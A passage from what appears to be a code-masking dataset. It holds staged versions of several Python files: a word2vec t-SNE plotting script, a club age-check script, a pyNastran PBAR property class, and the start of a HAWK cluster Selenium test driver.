"step-3": "<mask token>\nmodel = word2vec.load('text.bin')\nwords = [word for word in model.vocab[:500]]\nX = [model[word] for word in words]\nX = np.array(X)\ntsne = TSNE(n_components=2)\nX_tsne = tsne.fit_transform(X)\n\n\ndef plot_scatter(x, y, texts, adjust=False):\n fig, ax = plt.subplots()\n ax.plot(x, y, 'bo')\n texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]\n if adjust:\n plt.title(str(adjust_text(texts, x, y, arrowprops=dict(arrowstyle=\n '->', color='red'))) + ' iterations')\n plt.savefig('500')\n\n\npattern = re.compile('[,.:;!?“”’]')\nX, Y, texts = [], [], []\nfor i, word in enumerate(words):\n if not pattern.findall(word):\n tag = nltk.pos_tag([word])\n if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1\n ] != 'NN' and tag[0][1] != 'NNS':\n continue\n X.append(X_tsne[i][0])\n Y.append(X_tsne[i][1])\n texts.append(word)\nprint(len(X))\nplot_scatter(X, Y, texts, True)\n",
"step-4": "import re\nimport numpy as np\nfrom sklearn.manifold import TSNE\nimport word2vec\nfrom matplotlib import pyplot as plt\nfrom adjustText import adjust_text\nimport nltk\n<mask token>\nmodel = word2vec.load('text.bin')\nwords = [word for word in model.vocab[:500]]\nX = [model[word] for word in words]\nX = np.array(X)\ntsne = TSNE(n_components=2)\nX_tsne = tsne.fit_transform(X)\n\n\ndef plot_scatter(x, y, texts, adjust=False):\n fig, ax = plt.subplots()\n ax.plot(x, y, 'bo')\n texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]\n if adjust:\n plt.title(str(adjust_text(texts, x, y, arrowprops=dict(arrowstyle=\n '->', color='red'))) + ' iterations')\n plt.savefig('500')\n\n\npattern = re.compile('[,.:;!?“”’]')\nX, Y, texts = [], [], []\nfor i, word in enumerate(words):\n if not pattern.findall(word):\n tag = nltk.pos_tag([word])\n if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1\n ] != 'NN' and tag[0][1] != 'NNS':\n continue\n X.append(X_tsne[i][0])\n Y.append(X_tsne[i][1])\n texts.append(word)\nprint(len(X))\nplot_scatter(X, Y, texts, True)\n",
"step-5": "# coding: utf-8\nimport re\nimport numpy as np\nfrom sklearn.manifold import TSNE\nimport word2vec\nfrom matplotlib import pyplot as plt\nfrom adjustText import adjust_text\nimport nltk\n'''\nword2vec.word2phrase('all.txt', 'phrases.txt', verbose=True)\nword2vec.word2vec('phrases.txt', 'text.bin', size=100, verbose=True)\nword2vec.word2clusters('all.txt', 'clusters.txt', 100, verbose=True)\n'''\nmodel = word2vec.load('text.bin')\nwords = [word for word in model.vocab[:500]]\nX = [ model[word] for word in words]\nX = np.array(X)\ntsne = TSNE(n_components=2)\nX_tsne = tsne.fit_transform(X)\n\n\ndef plot_scatter(x,y,texts,adjust=False):\n\n fig, ax = plt.subplots()\n ax.plot(x, y, 'bo')\n\n texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]\n if adjust:\n plt.title(str( adjust_text(texts, x, y, arrowprops=dict(arrowstyle='->', color='red')))+' iterations')\n plt.savefig(\"500\")\n\npattern = re.compile(r\"[,.:;!?“”’]\")\nX, Y, texts = [], [], []\nfor i,word in enumerate(words):\n if not pattern.findall(word):\n tag = nltk.pos_tag([word])\n if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1] != 'NN' and tag[0][1] != 'NNS':\n continue\n X.append(X_tsne[i][0])\n Y.append(X_tsne[i][1])\n texts.append(word)\n\nprint(len(X))\nplot_scatter(X, Y, texts, True)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
print('-' * 60)
print(
'Welcome to CLUB425, the most lit club in downtown ACTvF. Before you can enter, I need you yo answer some question...'
)
print()
<|reserved_special_token_0|>
if age >= 21:
print('Cool, come on in.')
else:
print(
'Your gonna need to back up. This club is 21+ only so find somewhere else to party or find out what robot punches feel like. '
)
print('Anyway...have a good day! ')
print('-' * 60)
<|reserved_special_token_1|>
print('-' * 60)
print(
'Welcome to CLUB425, the most lit club in downtown ACTvF. Before you can enter, I need you yo answer some question...'
)
print()
age = input('What is your age today? ')
age = int(age)
if age >= 21:
print('Cool, come on in.')
else:
print(
'Your gonna need to back up. This club is 21+ only so find somewhere else to party or find out what robot punches feel like. '
)
print('Anyway...have a good day! ')
print('-' * 60)
|
flexible
|
{
"blob_id": "19ffac718008c7c9279fb8cbc7608597d2d3e708",
"index": 3937,
"step-1": "<mask token>\n",
"step-2": "print('-' * 60)\nprint(\n 'Welcome to CLUB425, the most lit club in downtown ACTvF. Before you can enter, I need you yo answer some question...'\n )\nprint()\n<mask token>\nif age >= 21:\n print('Cool, come on in.')\nelse:\n print(\n 'Your gonna need to back up. This club is 21+ only so find somewhere else to party or find out what robot punches feel like. '\n )\n print('Anyway...have a good day! ')\nprint('-' * 60)\n",
"step-3": "print('-' * 60)\nprint(\n 'Welcome to CLUB425, the most lit club in downtown ACTvF. Before you can enter, I need you yo answer some question...'\n )\nprint()\nage = input('What is your age today? ')\nage = int(age)\nif age >= 21:\n print('Cool, come on in.')\nelse:\n print(\n 'Your gonna need to back up. This club is 21+ only so find somewhere else to party or find out what robot punches feel like. '\n )\n print('Anyway...have a good day! ')\nprint('-' * 60)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from numpy import array, zeros, arange, concatenate, searchsorted, where, unique
from pyNastran.bdf.fieldWriter import print_card_8
from pyNastran.bdf.bdfInterface.assign_type import (integer, integer_or_blank,
double_or_blank, integer_double_or_blank, blank)
class PBAR(object):
type = 'PBAR'
def __init__(self, model):
"""
Defines the PCOMP object.
:param self: the PCOMP object
:param model: the BDF object
:param cards: the list of PCOMP cards
"""
self.model = model
self.n = 0
self._cards = []
self._comments = []
def add(self, card, comment):
self._cards.append(card)
self._comments.append(comment)
def build(self):
cards = self._cards
ncards = len(cards)
self.n = ncards
if ncards:
#: Property ID
self.property_id = zeros(ncards, 'int32')
self.material_id = zeros(ncards, 'int32')
self.area = zeros(ncards, 'float64')
self.I1 = zeros(ncards, 'float64')
self.I2 = zeros(ncards, 'float64')
self.J = zeros(ncards, 'float64')
self.nsm = zeros(ncards, 'float64')
for i, card in enumerate(cards):
#: property ID
self.property_id[i] = integer(card, 1, 'property_id')
#: material ID
self.material_id[i] = integer(card, 2, 'material_id')
#: material ID
self.area[i] = double_or_blank(card, 3, 'area', 0.0)
#: I1
self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)
#: I2
self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)
#: Polar Moment of Inertia J -> use J()
#: default=1/2(I1+I2) for SOL=600, otherwise 0.0
#: .. todo:: support SOL 600 default
Jdefault = 0.5 * (self.I1[i] + self.I2[i])
self.J[i] = double_or_blank(card, 6, 'J', Jdefault)
self.nsm[i] = double_or_blank(card, 7, 'non-structural_mass', 0.0)
if 0:
self.C1 = double_or_blank(card, 9, 'C1', 0.0)
self.C2 = double_or_blank(card, 10, 'C2', 0.0)
self.D1 = double_or_blank(card, 11, 'D1', 0.0)
self.D2 = double_or_blank(card, 12, 'D2', 0.0)
self.E1 = double_or_blank(card, 13, 'E1', 0.0)
self.E2 = double_or_blank(card, 14, 'E2', 0.0)
self.F1 = double_or_blank(card, 15, 'F1', 0.0)
self.F2 = double_or_blank(card, 16, 'F2', 0.0)
#: default=infinite; assume 1e8
self.K1 = double_or_blank(card, 17, 'K1', 1e8)
#: default=infinite; assume 1e8
self.K2 = double_or_blank(card, 18, 'K2', 1e8)
#: I12 -> use I12()
self.i12 = double_or_blank(card, 19, 'I12', 0.0)
if self.A == 0.0 and self.i12 == 0.0:
assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (self.A, self.i12, self.K1)
assert self.K2 is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (self.A, self.i12, self.K2)
assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)
i = self.property_id.argsort()
self.property_id = self.property_id[i]
self.material_id = self.material_id[i]
self.area = self.area[i]
self.I1 = self.I1[i]
self.I2 = self.I2[i]
self.J = self.J[i]
self.nsm = self.nsm[i]
unique_pids = unique(self.property_id)
if len(unique_pids) != len(self.property_id):
raise RuntimeError('There are duplicate PCOMP IDs...')
self._cards = []
self._comments = []
#=========================================================================
def get_index(self, property_ids):
if isinstance(property_ids, int):
property_ids = array([property_ids])
if property_ids is None:
return arange(self.n)
indexs = searchsorted(self.property_id, property_ids)
assert len(indexs) == len(property_ids), 'indexs=%s pids=%s' % (indexs, property_ids)
return indexs
#=========================================================================
def write_bdf(self, f, size=8, property_ids=None):
if self.n:
if property_ids is None:
i = arange(self.n)
else:
i = searchsorted(self.property_id, property_ids)
for (pid, mid, area, I1, I2, J) in zip(self.property_id[i], self.material_id[i],
self.area[i], self.I1[i], self.I2[i], self.J[i]):
card = ['PBAR', pid, mid, area, I1, I2, J]
f.write(print_card_8(card))
|
normal
|
{
"blob_id": "8f960ad465d0a7bf48752db35c73169be6da27d8",
"index": 9092,
"step-1": "<mask token>\n\n\nclass PBAR(object):\n <mask token>\n\n def __init__(self, model):\n \"\"\"\n Defines the PCOMP object.\n\n :param self: the PCOMP object\n :param model: the BDF object\n :param cards: the list of PCOMP cards\n \"\"\"\n self.model = model\n self.n = 0\n self._cards = []\n self._comments = []\n <mask token>\n\n def build(self):\n cards = self._cards\n ncards = len(cards)\n self.n = ncards\n if ncards:\n self.property_id = zeros(ncards, 'int32')\n self.material_id = zeros(ncards, 'int32')\n self.area = zeros(ncards, 'float64')\n self.I1 = zeros(ncards, 'float64')\n self.I2 = zeros(ncards, 'float64')\n self.J = zeros(ncards, 'float64')\n self.nsm = zeros(ncards, 'float64')\n for i, card in enumerate(cards):\n self.property_id[i] = integer(card, 1, 'property_id')\n self.material_id[i] = integer(card, 2, 'material_id')\n self.area[i] = double_or_blank(card, 3, 'area', 0.0)\n self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)\n self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)\n Jdefault = 0.5 * (self.I1[i] + self.I2[i])\n self.J[i] = double_or_blank(card, 6, 'J', Jdefault)\n self.nsm[i] = double_or_blank(card, 7,\n 'non-structural_mass', 0.0)\n if 0:\n self.C1 = double_or_blank(card, 9, 'C1', 0.0)\n self.C2 = double_or_blank(card, 10, 'C2', 0.0)\n self.D1 = double_or_blank(card, 11, 'D1', 0.0)\n self.D2 = double_or_blank(card, 12, 'D2', 0.0)\n self.E1 = double_or_blank(card, 13, 'E1', 0.0)\n self.E2 = double_or_blank(card, 14, 'E2', 0.0)\n self.F1 = double_or_blank(card, 15, 'F1', 0.0)\n self.F2 = double_or_blank(card, 16, 'F2', 0.0)\n self.K1 = double_or_blank(card, 17, 'K1', 100000000.0)\n self.K2 = double_or_blank(card, 18, 'K2', 100000000.0)\n self.i12 = double_or_blank(card, 19, 'I12', 0.0)\n if self.A == 0.0 and self.i12 == 0.0:\n assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (\n self.A, self.i12, self.K1)\n assert self.K2 is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (\n self.A, self.i12, self.K2)\n assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)\n i = self.property_id.argsort()\n self.property_id = self.property_id[i]\n self.material_id = self.material_id[i]\n self.area = self.area[i]\n self.I1 = self.I1[i]\n self.I2 = self.I2[i]\n self.J = self.J[i]\n self.nsm = self.nsm[i]\n unique_pids = unique(self.property_id)\n if len(unique_pids) != len(self.property_id):\n raise RuntimeError('There are duplicate PCOMP IDs...')\n self._cards = []\n self._comments = []\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass PBAR(object):\n <mask token>\n\n def __init__(self, model):\n \"\"\"\n Defines the PCOMP object.\n\n :param self: the PCOMP object\n :param model: the BDF object\n :param cards: the list of PCOMP cards\n \"\"\"\n self.model = model\n self.n = 0\n self._cards = []\n self._comments = []\n\n def add(self, card, comment):\n self._cards.append(card)\n self._comments.append(comment)\n\n def build(self):\n cards = self._cards\n ncards = len(cards)\n self.n = ncards\n if ncards:\n self.property_id = zeros(ncards, 'int32')\n self.material_id = zeros(ncards, 'int32')\n self.area = zeros(ncards, 'float64')\n self.I1 = zeros(ncards, 'float64')\n self.I2 = zeros(ncards, 'float64')\n self.J = zeros(ncards, 'float64')\n self.nsm = zeros(ncards, 'float64')\n for i, card in enumerate(cards):\n self.property_id[i] = integer(card, 1, 'property_id')\n self.material_id[i] = integer(card, 2, 'material_id')\n self.area[i] = double_or_blank(card, 3, 'area', 0.0)\n self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)\n self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)\n Jdefault = 0.5 * (self.I1[i] + self.I2[i])\n self.J[i] = double_or_blank(card, 6, 'J', Jdefault)\n self.nsm[i] = double_or_blank(card, 7,\n 'non-structural_mass', 0.0)\n if 0:\n self.C1 = double_or_blank(card, 9, 'C1', 0.0)\n self.C2 = double_or_blank(card, 10, 'C2', 0.0)\n self.D1 = double_or_blank(card, 11, 'D1', 0.0)\n self.D2 = double_or_blank(card, 12, 'D2', 0.0)\n self.E1 = double_or_blank(card, 13, 'E1', 0.0)\n self.E2 = double_or_blank(card, 14, 'E2', 0.0)\n self.F1 = double_or_blank(card, 15, 'F1', 0.0)\n self.F2 = double_or_blank(card, 16, 'F2', 0.0)\n self.K1 = double_or_blank(card, 17, 'K1', 100000000.0)\n self.K2 = double_or_blank(card, 18, 'K2', 100000000.0)\n self.i12 = double_or_blank(card, 19, 'I12', 0.0)\n if self.A == 0.0 and self.i12 == 0.0:\n assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (\n self.A, self.i12, self.K1)\n assert self.K2 is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (\n self.A, self.i12, self.K2)\n assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)\n i = self.property_id.argsort()\n self.property_id = self.property_id[i]\n self.material_id = self.material_id[i]\n self.area = self.area[i]\n self.I1 = self.I1[i]\n self.I2 = self.I2[i]\n self.J = self.J[i]\n self.nsm = self.nsm[i]\n unique_pids = unique(self.property_id)\n if len(unique_pids) != len(self.property_id):\n raise RuntimeError('There are duplicate PCOMP IDs...')\n self._cards = []\n self._comments = []\n\n def get_index(self, property_ids):\n if isinstance(property_ids, int):\n property_ids = array([property_ids])\n if property_ids is None:\n return arange(self.n)\n indexs = searchsorted(self.property_id, property_ids)\n assert len(indexs) == len(property_ids), 'indexs=%s pids=%s' % (indexs,\n property_ids)\n return indexs\n\n def write_bdf(self, f, size=8, property_ids=None):\n if self.n:\n if property_ids is None:\n i = arange(self.n)\n else:\n i = searchsorted(self.property_id, property_ids)\n for pid, mid, area, I1, I2, J in zip(self.property_id[i], self.\n material_id[i], self.area[i], self.I1[i], self.I2[i], self.J[i]\n ):\n card = ['PBAR', pid, mid, area, I1, I2, J]\n f.write(print_card_8(card))\n",
"step-3": "<mask token>\n\n\nclass PBAR(object):\n type = 'PBAR'\n\n def __init__(self, model):\n \"\"\"\n Defines the PCOMP object.\n\n :param self: the PCOMP object\n :param model: the BDF object\n :param cards: the list of PCOMP cards\n \"\"\"\n self.model = model\n self.n = 0\n self._cards = []\n self._comments = []\n\n def add(self, card, comment):\n self._cards.append(card)\n self._comments.append(comment)\n\n def build(self):\n cards = self._cards\n ncards = len(cards)\n self.n = ncards\n if ncards:\n self.property_id = zeros(ncards, 'int32')\n self.material_id = zeros(ncards, 'int32')\n self.area = zeros(ncards, 'float64')\n self.I1 = zeros(ncards, 'float64')\n self.I2 = zeros(ncards, 'float64')\n self.J = zeros(ncards, 'float64')\n self.nsm = zeros(ncards, 'float64')\n for i, card in enumerate(cards):\n self.property_id[i] = integer(card, 1, 'property_id')\n self.material_id[i] = integer(card, 2, 'material_id')\n self.area[i] = double_or_blank(card, 3, 'area', 0.0)\n self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)\n self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)\n Jdefault = 0.5 * (self.I1[i] + self.I2[i])\n self.J[i] = double_or_blank(card, 6, 'J', Jdefault)\n self.nsm[i] = double_or_blank(card, 7,\n 'non-structural_mass', 0.0)\n if 0:\n self.C1 = double_or_blank(card, 9, 'C1', 0.0)\n self.C2 = double_or_blank(card, 10, 'C2', 0.0)\n self.D1 = double_or_blank(card, 11, 'D1', 0.0)\n self.D2 = double_or_blank(card, 12, 'D2', 0.0)\n self.E1 = double_or_blank(card, 13, 'E1', 0.0)\n self.E2 = double_or_blank(card, 14, 'E2', 0.0)\n self.F1 = double_or_blank(card, 15, 'F1', 0.0)\n self.F2 = double_or_blank(card, 16, 'F2', 0.0)\n self.K1 = double_or_blank(card, 17, 'K1', 100000000.0)\n self.K2 = double_or_blank(card, 18, 'K2', 100000000.0)\n self.i12 = double_or_blank(card, 19, 'I12', 0.0)\n if self.A == 0.0 and self.i12 == 0.0:\n assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (\n self.A, self.i12, self.K1)\n assert self.K2 is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (\n self.A, self.i12, self.K2)\n assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)\n i = self.property_id.argsort()\n self.property_id = self.property_id[i]\n self.material_id = self.material_id[i]\n self.area = self.area[i]\n self.I1 = self.I1[i]\n self.I2 = self.I2[i]\n self.J = self.J[i]\n self.nsm = self.nsm[i]\n unique_pids = unique(self.property_id)\n if len(unique_pids) != len(self.property_id):\n raise RuntimeError('There are duplicate PCOMP IDs...')\n self._cards = []\n self._comments = []\n\n def get_index(self, property_ids):\n if isinstance(property_ids, int):\n property_ids = array([property_ids])\n if property_ids is None:\n return arange(self.n)\n indexs = searchsorted(self.property_id, property_ids)\n assert len(indexs) == len(property_ids), 'indexs=%s pids=%s' % (indexs,\n property_ids)\n return indexs\n\n def write_bdf(self, f, size=8, property_ids=None):\n if self.n:\n if property_ids is None:\n i = arange(self.n)\n else:\n i = searchsorted(self.property_id, property_ids)\n for pid, mid, area, I1, I2, J in zip(self.property_id[i], self.\n material_id[i], self.area[i], self.I1[i], self.I2[i], self.J[i]\n ):\n card = ['PBAR', pid, mid, area, I1, I2, J]\n f.write(print_card_8(card))\n",
"step-4": "from numpy import array, zeros, arange, concatenate, searchsorted, where, unique\nfrom pyNastran.bdf.fieldWriter import print_card_8\nfrom pyNastran.bdf.bdfInterface.assign_type import integer, integer_or_blank, double_or_blank, integer_double_or_blank, blank\n\n\nclass PBAR(object):\n type = 'PBAR'\n\n def __init__(self, model):\n \"\"\"\n Defines the PCOMP object.\n\n :param self: the PCOMP object\n :param model: the BDF object\n :param cards: the list of PCOMP cards\n \"\"\"\n self.model = model\n self.n = 0\n self._cards = []\n self._comments = []\n\n def add(self, card, comment):\n self._cards.append(card)\n self._comments.append(comment)\n\n def build(self):\n cards = self._cards\n ncards = len(cards)\n self.n = ncards\n if ncards:\n self.property_id = zeros(ncards, 'int32')\n self.material_id = zeros(ncards, 'int32')\n self.area = zeros(ncards, 'float64')\n self.I1 = zeros(ncards, 'float64')\n self.I2 = zeros(ncards, 'float64')\n self.J = zeros(ncards, 'float64')\n self.nsm = zeros(ncards, 'float64')\n for i, card in enumerate(cards):\n self.property_id[i] = integer(card, 1, 'property_id')\n self.material_id[i] = integer(card, 2, 'material_id')\n self.area[i] = double_or_blank(card, 3, 'area', 0.0)\n self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)\n self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)\n Jdefault = 0.5 * (self.I1[i] + self.I2[i])\n self.J[i] = double_or_blank(card, 6, 'J', Jdefault)\n self.nsm[i] = double_or_blank(card, 7,\n 'non-structural_mass', 0.0)\n if 0:\n self.C1 = double_or_blank(card, 9, 'C1', 0.0)\n self.C2 = double_or_blank(card, 10, 'C2', 0.0)\n self.D1 = double_or_blank(card, 11, 'D1', 0.0)\n self.D2 = double_or_blank(card, 12, 'D2', 0.0)\n self.E1 = double_or_blank(card, 13, 'E1', 0.0)\n self.E2 = double_or_blank(card, 14, 'E2', 0.0)\n self.F1 = double_or_blank(card, 15, 'F1', 0.0)\n self.F2 = double_or_blank(card, 16, 'F2', 0.0)\n self.K1 = double_or_blank(card, 17, 'K1', 100000000.0)\n self.K2 = double_or_blank(card, 18, 'K2', 100000000.0)\n self.i12 = double_or_blank(card, 19, 'I12', 0.0)\n if self.A == 0.0 and self.i12 == 0.0:\n assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (\n self.A, self.i12, self.K1)\n assert self.K2 is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (\n self.A, self.i12, self.K2)\n assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)\n i = self.property_id.argsort()\n self.property_id = self.property_id[i]\n self.material_id = self.material_id[i]\n self.area = self.area[i]\n self.I1 = self.I1[i]\n self.I2 = self.I2[i]\n self.J = self.J[i]\n self.nsm = self.nsm[i]\n unique_pids = unique(self.property_id)\n if len(unique_pids) != len(self.property_id):\n raise RuntimeError('There are duplicate PCOMP IDs...')\n self._cards = []\n self._comments = []\n\n def get_index(self, property_ids):\n if isinstance(property_ids, int):\n property_ids = array([property_ids])\n if property_ids is None:\n return arange(self.n)\n indexs = searchsorted(self.property_id, property_ids)\n assert len(indexs) == len(property_ids), 'indexs=%s pids=%s' % (indexs,\n property_ids)\n return indexs\n\n def write_bdf(self, f, size=8, property_ids=None):\n if self.n:\n if property_ids is None:\n i = arange(self.n)\n else:\n i = searchsorted(self.property_id, property_ids)\n for pid, mid, area, I1, I2, J in zip(self.property_id[i], self.\n material_id[i], self.area[i], self.I1[i], self.I2[i], self.J[i]\n ):\n card = ['PBAR', pid, mid, area, I1, I2, J]\n f.write(print_card_8(card))\n",
"step-5": "from numpy import array, zeros, arange, concatenate, searchsorted, where, unique\n\nfrom pyNastran.bdf.fieldWriter import print_card_8\nfrom pyNastran.bdf.bdfInterface.assign_type import (integer, integer_or_blank,\n double_or_blank, integer_double_or_blank, blank)\n\n\nclass PBAR(object):\n type = 'PBAR'\n def __init__(self, model):\n \"\"\"\n Defines the PCOMP object.\n\n :param self: the PCOMP object\n :param model: the BDF object\n :param cards: the list of PCOMP cards\n \"\"\"\n self.model = model\n self.n = 0\n self._cards = []\n self._comments = []\n\n def add(self, card, comment):\n self._cards.append(card)\n self._comments.append(comment)\n\n def build(self):\n cards = self._cards\n ncards = len(cards)\n self.n = ncards\n\n if ncards:\n #: Property ID\n self.property_id = zeros(ncards, 'int32')\n self.material_id = zeros(ncards, 'int32')\n self.area = zeros(ncards, 'float64')\n self.I1 = zeros(ncards, 'float64')\n self.I2 = zeros(ncards, 'float64')\n self.J = zeros(ncards, 'float64')\n self.nsm = zeros(ncards, 'float64')\n\n for i, card in enumerate(cards):\n #: property ID\n self.property_id[i] = integer(card, 1, 'property_id')\n\n #: material ID\n self.material_id[i] = integer(card, 2, 'material_id')\n\n\n #: material ID\n self.area[i] = double_or_blank(card, 3, 'area', 0.0)\n\n #: I1\n self.I1[i] = double_or_blank(card, 4, 'I1', 0.0)\n\n #: I2\n self.I2[i] = double_or_blank(card, 5, 'I2', 0.0)\n\n #: Polar Moment of Inertia J -> use J()\n #: default=1/2(I1+I2) for SOL=600, otherwise 0.0\n #: .. todo:: support SOL 600 default\n\n Jdefault = 0.5 * (self.I1[i] + self.I2[i])\n self.J[i] = double_or_blank(card, 6, 'J', Jdefault)\n self.nsm[i] = double_or_blank(card, 7, 'non-structural_mass', 0.0)\n\n if 0:\n self.C1 = double_or_blank(card, 9, 'C1', 0.0)\n self.C2 = double_or_blank(card, 10, 'C2', 0.0)\n self.D1 = double_or_blank(card, 11, 'D1', 0.0)\n self.D2 = double_or_blank(card, 12, 'D2', 0.0)\n self.E1 = double_or_blank(card, 13, 'E1', 0.0)\n self.E2 = double_or_blank(card, 14, 'E2', 0.0)\n self.F1 = double_or_blank(card, 15, 'F1', 0.0)\n self.F2 = double_or_blank(card, 16, 'F2', 0.0)\n\n #: default=infinite; assume 1e8\n self.K1 = double_or_blank(card, 17, 'K1', 1e8)\n #: default=infinite; assume 1e8\n self.K2 = double_or_blank(card, 18, 'K2', 1e8)\n #: I12 -> use I12()\n self.i12 = double_or_blank(card, 19, 'I12', 0.0)\n if self.A == 0.0 and self.i12 == 0.0:\n assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (self.A, self.i12, self.K1)\n assert self.K2 is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (self.A, self.i12, self.K2)\n assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)\n\n i = self.property_id.argsort()\n self.property_id = self.property_id[i]\n self.material_id = self.material_id[i]\n\n self.area = self.area[i]\n self.I1 = self.I1[i]\n self.I2 = self.I2[i]\n self.J = self.J[i]\n self.nsm = self.nsm[i]\n\n unique_pids = unique(self.property_id)\n\n if len(unique_pids) != len(self.property_id):\n raise RuntimeError('There are duplicate PCOMP IDs...')\n self._cards = []\n self._comments = []\n\n #=========================================================================\n def get_index(self, property_ids):\n if isinstance(property_ids, int):\n property_ids = array([property_ids])\n if property_ids is None:\n return arange(self.n)\n\n indexs = searchsorted(self.property_id, property_ids)\n assert len(indexs) == len(property_ids), 'indexs=%s pids=%s' % (indexs, property_ids)\n return indexs\n\n #=========================================================================\n def write_bdf(self, f, size=8, property_ids=None):\n if self.n:\n if property_ids is None:\n i = arange(self.n)\n else:\n i = searchsorted(self.property_id, property_ids)\n\n for (pid, mid, area, I1, I2, J) in zip(self.property_id[i], self.material_id[i],\n self.area[i], self.I1[i], self.I2[i], self.J[i]):\n card = ['PBAR', pid, mid, area, I1, I2, J]\n f.write(print_card_8(card))\n",
"step-ids": [
3,
6,
7,
8,
9
]
}
|
[
3,
6,
7,
8,
9
] |
#!/usr/bin/python3
"""HAWK GUI interface Selenium test: tests hawk GUI with Selenium using firefox or chrome"""
import argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results
### MAIN
# Command line argument parsing
parser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test')
parser.add_argument('-b', '--browser', type=str, required=True,
help='Browser to use in the test. Can be: firefox, chrome, chromium')
parser.add_argument('-H', '--host', type=str, default='localhost',
help='Host or IP address where HAWK is running')
parser.add_argument('-P', '--port', type=str, default='7630',
help='TCP port where HAWK is running')
parser.add_argument('-p', '--prefix', type=str, default='',
help='Prefix to add to Resources created during the test')
parser.add_argument('-t', '--test-version', type=str, default='', required=True,
help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')
parser.add_argument('-s', '--secret', type=str, default='',
help='root SSH Password of the HAWK node')
parser.add_argument('-r', '--results', type=str, default='',
help='Generate hawk_test.results file')
args = parser.parse_args()
# Create driver instance
browser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args.port,
browser=args.browser.lower(),
version=args.test_version.lower())
# Initialize results set
results = hawk_test_results.resultSet()
# Establish SSH connection to verify status only if SSH password was supplied
if args.secret:
ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)
results.add_ssh_tests()
# Resources to create
if args.prefix and not re.match(r"^\w+$", args.prefix.lower()):
print("ERROR: Prefix must contain only numbers and letters. Ignoring")
args.prefix = ''
mycluster = args.prefix.lower() + 'Anderes'
myprimitive = args.prefix.lower() + 'cool_primitive'
myclone = args.prefix.lower() + 'cool_clone'
mygroup = args.prefix.lower() + 'cool_group'
# Tests to perform
browser.test('test_set_stonith_maintenance', results)
if args.secret:
ssh.verify_stonith_in_maintenance(results)
browser.test('test_disable_stonith_maintenance', results)
browser.test('test_view_details_first_node', results)
browser.test('test_clear_state_first_node', results)
browser.test('test_set_first_node_maintenance', results)
if args.secret:
ssh.verify_node_maintenance(results)
browser.test('test_disable_maintenance_first_node', results)
browser.test('test_add_new_cluster', results, mycluster)
browser.test('test_remove_cluster', results, mycluster)
browser.test('test_click_on_history', results)
browser.test('test_generate_report', results)
browser.test('test_click_on_command_log', results)
browser.test('test_click_on_status', results)
browser.test('test_add_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive(myprimitive, args.test_version.lower(), results)
browser.test('test_remove_primitive', results, myprimitive)
if args.secret:
ssh.verify_primitive_removed(results)
browser.test('test_add_clone', results, myclone)
browser.test('test_remove_clone', results, myclone)
browser.test('test_add_group', results, mygroup)
browser.test('test_remove_group', results, mygroup)
browser.test('test_click_around_edit_conf', results)
# Save results if run with -r or --results
if args.results:
results.logresults(args.results)
quit(results.get_failed_tests_total())
|
normal
|
{
"blob_id": "874668d5f3ea61b6aabde7b784078b431961a9c9",
"index": 9096,
"step-1": "<mask token>\n",
